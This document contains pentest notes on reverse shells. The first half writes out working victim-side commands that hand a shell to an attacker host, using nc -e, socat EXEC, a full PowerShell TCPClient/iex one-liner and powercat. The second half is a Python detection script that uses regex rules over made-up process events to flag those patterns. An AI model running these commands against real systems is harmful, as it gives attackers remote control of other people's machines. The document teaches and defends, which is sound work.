Reverse Shells
Working with and using reverse shells
- A reverse shell is a command run on the target that launches a shell and connects its input and output back to a listener on your own machine, so the target initiates the outbound connection rather than you connecting in. Many tools can be used for this; the examples below use nc, socat, a PowerShell one-liner, and powercat.
```bash
# Create a listener on local host (attacker)
nc -nvlp 4123

# Execute on victim
nc -nv <attacker IP> 4123 -e /bin/bash   # Linux victim
nc -nv <attacker IP> 4123 -e cmd.exe     # Windows victim
```
- If you don't add `-d -d` to the socat listener command, you won't see when the connection happens.
```bash
# Create a listener on local host (attacker)
sudo socat -d -d TCP4-LISTEN:443 STDOUT

# Execute on victim
socat TCP4:192.168.127.133:443 EXEC:/bin/bash          # Linux victim
socat TCP4:192.168.127.133:443 EXEC:'cmd.exe',pipes    # Windows victim
```
```shell
# Create a listener on local host (attacker)
sudo nc -lnvp 443

# Execute on victim (windows)
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER IP',ATTACKER PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
- Powercat needs to be on the Windows victim first, so either download it there or transfer the powercat.ps1 script from the attacker machine, then dot-source it before calling it.
```shell
# Create a listener on local host (attacker)
sudo nc -lnvp 443

# Execute on victim (windows)
. .\powercat.ps1
powercat -c <ATTACKER IP> -p 443 -e cmd.exe
```
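Every variant above leaves the same trace on the endpoint: a process whose command line hands a shell to a network socket. As an added example (not part of the original notes, and not from any of the tools named here), the script below runs simple detection rules for the four patterns shown on this page over a constructed set of process-creation events and raises the severity when the parent process is something that should never spawn a shell. The event format, host names, parent images and IP addresses are all made up for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed sample of endpoint process-creation events (not real telemetry).
# Each record is: host|user|parent_image|command_line
SAMPLE_EVENTS = [
    "ws01|alice|/usr/bin/bash|ls -la /tmp",
    "ws01|alice|/usr/bin/bash|nc -nv 10.0.0.5 4123 -e /bin/bash",
    "srv02|www-data|/usr/sbin/apache2|socat TCP4:10.0.0.5:443 EXEC:/bin/bash",
    "srv02|root|/usr/bin/bash|socat -V",
    "pc03|bob|explorer.exe|powershell -c Get-Process",
    "pc03|bob|winword.exe|powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',443);"
    "$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\"",
    "pc03|bob|cmd.exe|powercat -c 10.0.0.5 -p 443 -e cmd.exe",
]

# Detection rules, one per technique on the page. Each matches the part of the
# command line that binds a shell to the socket, not just the tool name, so a
# plain `socat -V` or `nc -z` port check does not fire.
RULES = [
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("socat_exec", re.compile(r"\bsocat\b.*\b(EXEC|SYSTEM):")),
    ("powershell_tcpclient",
     re.compile(r"(?i)powershell.*TCPClient\(.*\b(GetStream|iex|Invoke-Expression)\b")),
    ("powercat_exec", re.compile(r"(?i)\bpowercat\b.*\s-c\s.*\s-e\s")),
]

# Parents that have no business launching an interactive shell (assumed list);
# a hit under one of these is escalated.
HIGH_RISK_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                     "/usr/sbin/apache2", "/usr/sbin/nginx", "w3wp.exe"}


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    parent: str
    rule: str
    severity: str
    command_line: str


def parse_event(line: str):
    """Split one pipe-delimited event into its four fields."""
    host, user, parent, cmdline = line.split("|", 3)
    return host, user, parent, cmdline


def severity_for(parent: str) -> str:
    """Escalate when the parent is an Office app or a web server."""
    return "high" if parent.lower() in HIGH_RISK_PARENTS else "medium"


def detect(events) -> list[Finding]:
    """Return one Finding per event whose command line matches a rule."""
    findings = []
    for line in events:
        host, user, parent, cmdline = parse_event(line)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(host, user, parent, name,
                                        severity_for(parent), cmdline))
                break  # first matching rule wins; one finding per event
    return findings


def summarize(findings) -> dict[str, int]:
    """Count findings per host, useful for a quick triage view."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host} {f.user} parent={f.parent} rule={f.rule}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

The rules key on the shell-binding argument (`-e`, `EXEC:`, `TCPClient(` together with `GetStream`/`iex`) rather than on the tool name alone, which is what keeps administrative uses of nc and socat out of the alert queue; in production the same logic would read Sysmon event ID 1 or auditd execve records instead of the constructed list.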